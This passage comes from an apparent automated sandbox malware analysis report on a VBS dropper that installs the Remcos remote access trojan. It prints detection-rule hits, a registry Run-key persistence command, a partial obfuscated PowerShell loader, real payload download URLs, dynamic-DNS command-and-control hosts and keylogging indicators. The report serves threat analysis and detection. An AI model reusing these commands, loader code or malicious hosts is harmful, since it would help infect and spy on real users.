          • 0xac54a:$s1: -join
          • 0xac592:$s1: -join
          • 0xac5b1:$s1: -join
          • 0xace01:$s1: -join
          • 0xacf7d:$s1: -join
          • 0xacff5:$s1: -join
          • 0xad088:$s1: -join
          • 0xad2ee:$s1: -join
          • 0xaf484:$s1: -join
          • 0xbdece:$s1: -join

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", ProcessId: 2428, ProcessName: wscript.exe
          Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\obviously
          Sigma detected: Direct Autorun Keys Modification
          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", ProcessId: 6776, ProcessName: reg.exe
          Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), CommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), ProcessId: 5960, ProcessName: cmd.exe
          Sigma detected: Suspicious Powershell In Registry Run Keys
          Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\obviously
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", ProcessId: 2428, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessne
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4568, ProcessName: svchost.exe

          Stealing of Sensitive Information

          barindex
          Sigma detected: Remcos
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5548, TargetFilename: C:\ProgramData\remcos\logs.dat

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: rnnfibiteammony.duckdns.orgVirustotal: Detection: 15%Perma Link
          Source: tolatilbu.hopto.orgVirustotal: Detection: 15%Perma Link
          Yara detected Remcos RAT
          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
          Source: unknownHTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49763 version: TLS 1.2

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Uses dynamic DNS services
          Source: unknownDNS query: name: rnnfibiteammony.duckdns.org
          Source: global trafficTCP traffic: 192.168.2.5:49745 -> 180.214.236.46:4848
          Source: Joe Sandbox ViewIP Address: 180.214.236.46 180.214.236.46
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /wp-admin/Klassespecifikke.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: maso.geCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /zwDhHUJEmBIkUtXcwKsarX186.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: brustiaalfa.websin.itCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /wp-admin/gGzbBm204.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: maso.geCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /Produktionshallens.thn HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMTUser-Agent: Microsoft BITS/7.8Host: brustiaalfa.websin.it
          Source: global trafficHTTP traffic detected: GET /Produktionshallens.thn HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMTUser-Agent: Microsoft BITS/7.8Host: brustiaalfa.websin.it
          Source: global trafficHTTP traffic detected: GET /wp-admin/Klassespecifikke.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: maso.geCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /zwDhHUJEmBIkUtXcwKsarX186.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: brustiaalfa.websin.itCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /wp-admin/Reciteret.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMTUser-Agent: Microsoft BITS/7.8Host: maso.ge
          Source: global trafficHTTP traffic detected: GET /wp-admin/Reciteret.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMTUser-Agent: Microsoft BITS/7.8Host: maso.ge
          Source: global trafficHTTP traffic detected: GET /wp-admin/gGzbBm204.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: maso.geCache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: brustiaalfa.websin.it
          Source: powershell.exe, 00000005.00000002.2801177789.000000000709B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000005.00000002.2765789549.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microR
          Source: wscript.exe, 00000000.00000002.2217419966.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216201084.000001F01BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216774961.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868545183.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: wscript.exe, 0000000A.00000003.2868545183.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000002.2217419966.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216201084.000001F01BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216774961.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmer
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BC3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BAA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
          Source: svchost.exe, 00000006.00000003.2431109761.00000273EF137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://brustiaalfa.websin.it/Produktionshallens.thn
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://brustiaalfa.websin.it/Produktionshallens.thnp
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF1A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BB5A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: svchost.exe, 00000006.00000003.2898965598.00000273EF13C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2928487797.00000273EF13F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maso.ge/wp-admin/Reciteret.rar
          Source: powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownHTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49763 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Installs a global keyboard hook
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 1628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Potential malicious VBS script found (suspicious strings)
          Source: Initial file: Monotellurite.ShellExecute Hjerteanfaldene,Feistiest,"","" ,Electrotype
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped file: Herthas117.ShellExecute Redningsaktioner,Goajiro71,"","" ,MandehulJump to dropped file
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5782
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5782
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 5416
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5782Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5782Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 5416Jump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Writes or reads registry keys via WMI
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
